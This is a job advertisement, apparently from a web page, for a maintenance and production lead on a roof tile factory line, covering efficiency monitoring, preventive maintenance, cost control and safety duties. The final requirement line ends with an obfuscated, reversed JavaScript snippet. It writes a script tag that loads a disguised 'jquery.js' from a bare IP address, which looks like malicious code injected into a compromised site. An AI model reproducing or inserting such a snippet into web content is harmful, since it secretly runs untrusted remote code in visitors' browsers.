Industry : Manufacturing
To lead and monitor the roof tile production line to ensure the objectives in relation to cost, quality, schedule, volume, maintenance, Health & Safety are achieved with high level of performance.
• To lead and support maintenance personnel to achieve company’s objective in the areas efficiency, cost & safety.
• Continuously monitor daily, weekly and monthly production efficiency and to take immediate counter-measures to ensure that production efficiency is maintained at high level.
• Monitor daily, weekly and monthly production downtime and to identify the major downtimes and its root cause(s) so that counter-measures can be taken to eliminate/reduce the downtime.
• Plan, organize and carry out preventive maintenance on the plant and machinery in order to maintain and improve machinery reliability.
• Ensure timely reorder to spare parts to eliminate plant stoppage.
• To monitor and control proper and economic use of parts and sub-contractor services to ensure the maintenance cost target is achieved.
• Continuously seek and implement cost saving measures and ensure low operating cost for plant and machinery.
• To mistake-proof machineries and/or procedures to ensure safe working conditions and the maintenance team follow safety guidelines to prevent accidents.
• Continuously seek to improve workplace organization and ensure good housekeeping in the maintenance areas.
• Assist Production Supervisor, Factory Manager and other division heads as and when necessary.
• To carry out any other duties or jobs functions instructed by superior from time to time.
• Responsible for the Plant in the absence of Factory Manager.
• Minimum Diploma or Degree holder in Mechanical Engineering or similar
• Minimum 3 years relevant experience document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))